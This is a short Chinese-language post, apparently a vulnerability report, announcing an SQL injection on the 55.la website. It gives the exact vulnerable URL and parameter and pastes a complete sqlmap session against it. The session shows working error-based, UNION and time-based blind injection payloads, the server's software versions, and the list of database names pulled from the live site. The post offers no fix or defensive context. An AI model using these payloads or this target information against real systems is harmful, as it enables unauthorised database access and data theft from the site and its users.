我拉网主站一处sql注入_MySQL

http://www.55.la/run/ding_banner.php?bid=21022

注入地址:http://www.55.la/run/ding_banner.php?bid=21022<br /><br />	sqlmap/1.0-dev - automatic SQL injection and database takeover tool<br />	http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual<br /> consent is illegal. It is the end user's responsibility to obey all applicable<br />local, state and federal laws. Authors assume no liability and are not responsib<br />le for any misuse or damage caused by this program<br /><br />[*] starting at 02:04:07<br /><br />[02:04:07] [INFO] using 'C:/Users/Administrator/Desktop/渗透工具/sqlmap GUI汉化<br />版/rar/output/www.55.la/session' as session file<br />[02:04:07] [INFO] testing connection to the target url<br />[02:04:07] [INFO] testing if the url is stable, wait a few seconds<br />[02:04:08] [INFO] url is stable<br />[02:04:08] [INFO] testing if GET parameter 'bid' is dynamic<br />[02:04:09] [INFO] confirming that GET parameter 'bid' is dynamic<br />[02:04:09] [INFO] GET parameter 'bid' is dynamic<br />[02:04:09] [INFO] heuristic test shows that GET parameter 'bid' might be injecta<br />ble (possible DBMS: MySQL)<br />[02:04:09] [INFO] testing sql injection on GET parameter 'bid'<br />[02:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br />[02:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />'<br />[02:04:11] [INFO] GET parameter 'bid' is 'MySQL >= 5.0 AND error-based - WHERE o<br />r HAVING clause' injectable<br />[02:04:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br />[02:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'<br />[02:04:21] [INFO] GET parameter 'bid' is 'MySQL > 5.0.11 AND time-based blind' i<br />njectable<br />[02:04:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'<br />[02:04:24] [INFO] target url appears to be UNION injectable with 1 columns<br />[02:04:25] [INFO] GET parameter 'bid' is 'MySQL UNION query (NULL) - 1 to 10 col<br />umns' injectable<br />GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if an<br />y)? [y/N] y<br />sqlmap identified the following injection points with a total of 32 HTTP(s) requ<br />ests:<br />---<br />Place: GET<br />Parameter: bid<br />	Type: error-based<br />	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />	Payload: bid=21022' AND (SELECT 3637 FROM(SELECT COUNT(*),CONCAT(0x3a6f636a3<br />a,(SELECT (CASE WHEN (3637=3637) THEN 1 ELSE 0 END)),0x3a7862753a,FLOOR(RAND(0)*<br />2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uYVe'='uYVe<br /><br />	Type: UNION query<br />	Title: MySQL UNION query (NULL) - 1 column<br />	Payload: bid=-1700' UNION SELECT CONCAT(0x3a6f636a3a,0x676e4261505364745265,<br />0x3a7862753a)# AND 'EXgA'='EXgA<br /><br />	Type: AND/OR time-based blind<br />	Title: MySQL > 5.0.11 AND time-based blind<br />	Payload: bid=21022' AND SLEEP(5) AND 'xros'='xros<br />---<br /><br />[02:04:27] [INFO] the back-end DBMS is MySQL<br /><br />web application technology: Nginx, PHP 5.3.24<br />back-end DBMS: MySQL 5.0<br />[02:04:27] [INFO] fetching database names<br />[02:04:30] [INFO] the SQL query used returns 5 entries<br />[02:04:30] [INFO] retrieved: "information_schema"<br />[02:04:37] [INFO] retrieved: "help55la"<br />[02:04:37] [INFO] retrieved: "test"<br />[02:04:37] [INFO] retrieved: "u_run55_la"<br />[02:04:37] [INFO] retrieved: "wstp8_com"<br />available databases [5]:<br />[*] help55la<br />[*] information_schema<br />[*] test<br />[*] u_run55_la<br />[*] wstp8_com<br /><br />[02:04:37] [INFO] Fetched data logged to text files under 'C:/Users/Administrato<br />r/Desktop/渗透工具/sqlmap GUI汉化版/rar/output/www.55.la'<br /><br />[*] shutting down at 02:04:37